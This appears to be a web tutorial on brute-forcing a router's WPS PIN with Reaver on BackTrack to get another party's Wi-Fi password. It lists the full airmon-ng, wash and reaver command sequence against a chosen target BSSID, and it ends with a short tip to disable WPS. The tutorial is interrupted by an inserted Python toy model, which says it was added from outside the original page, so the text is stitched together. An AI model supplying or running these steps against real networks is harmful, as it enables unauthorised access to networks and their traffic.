First, you will need a USB flash drive to install Linux BackTrack.
BackTrack is a standalone operating system that comes packed with a security suite containing tools for monitoring and security auditing. In this case, we will use BackTrack to exploit vulnerabilities of a wireless network.
The Reaver tool is installed in BackTrack by default and will help us obtain the key, PIN and SSID of the wireless network we want to access. Reaver exploits a vulnerability found on most routers and access points featuring WPS (Wi-Fi Protected Setup).
How is the Wi-Fi password snatched?
Using a brute-force method, Reaver tries PIN combinations until it uncovers the WPS PIN. The vulnerability resides in the fact that the router validates the first 4 digits of the PIN on their own, so Reaver can uncover those first and then move on to the second set of 4 digits, which greatly reduces the brute-forcing time.
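To make the split-validation point concrete, here is an added toy model (not code from the original page; the two router classes are constructed stand-ins, not a real WPS implementation) that counts how many guesses each validation design costs an attacker:

```python
# Toy model of why checking an 8-digit PIN as two independent 4-digit halves
# collapses the search space. Constructed illustration, not a real WPS stack.

HALF = 4                        # WPS PINs are 8 digits, treated as two halves
HALF_SPACE = 10 ** HALF         # 10,000 candidates per half
FULL_SPACE = 10 ** (2 * HALF)   # 100,000,000 candidates for an atomic check


class SplitValidatingRouter:
    """Flawed design: the reply reveals whether the first half matched
    before the second half is even examined."""

    def __init__(self, pin: str) -> None:
        self.pin = pin

    def check(self, guess: str) -> str:
        if guess[:HALF] != self.pin[:HALF]:
            return "first-half-wrong"    # this distinct answer is the leak
        if guess[HALF:] != self.pin[HALF:]:
            return "second-half-wrong"
        return "ok"


class AtomicRouter:
    """Hardened design: one yes/no answer for the whole PIN, nothing else."""

    def __init__(self, pin: str) -> None:
        self.pin = pin

    def check(self, guess: str) -> str:
        return "ok" if guess == self.pin else "wrong"


def guesses_needed_split(router: SplitValidatingRouter) -> int:
    """Guesses required when the oracle leaks per-half results: each half is
    searched on its own, so the bound is 2 * 10^4 rather than 10^8."""
    guesses = 0
    first_half = ""
    for i in range(HALF_SPACE):
        guesses += 1
        if router.check(f"{i:0{HALF}d}" + "0" * HALF) != "first-half-wrong":
            first_half = f"{i:0{HALF}d}"
            break
    for j in range(HALF_SPACE):
        guesses += 1
        if router.check(first_half + f"{j:0{HALF}d}") == "ok":
            return guesses
    raise RuntimeError("PIN not found; unreachable for a well-formed PIN")


def worst_case_split() -> int:
    return 2 * HALF_SPACE       # 20,000 guesses


def worst_case_atomic() -> int:
    return FULL_SPACE           # 100,000,000 guesses
```

The gap between worst_case_split() and worst_case_atomic() is why a wait of minutes to hours is enough against the flawed design, and why the fix is to stop exposing the half-PIN result (or WPS altogether), not to pick a longer PIN.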
What commands do you use?
- airmon-ng to list the wireless cards.
- airmon-ng start wlan0 (or wlan1, depending on how many wireless cards are detected and which one you want to put into monitor mode).
- wash -i mon0 to detect WPS-enabled wireless networks. If you get a "Found packet with bad FCS, skipping..." error, try wash -i mon0 --ignore-fcs instead.
- reaver -i mon0 -b <BSSID of the target network> -d 0 -vv
Now you will have to wait between a few minutes and a few hours before the Wi-Fi password is uncovered.
How do you protect against this exploit?
It's simple: just deactivate WPS (it is called QSS on TP-Link routers). It is normally enabled by default from the factory so that the router can obtain WPS certification.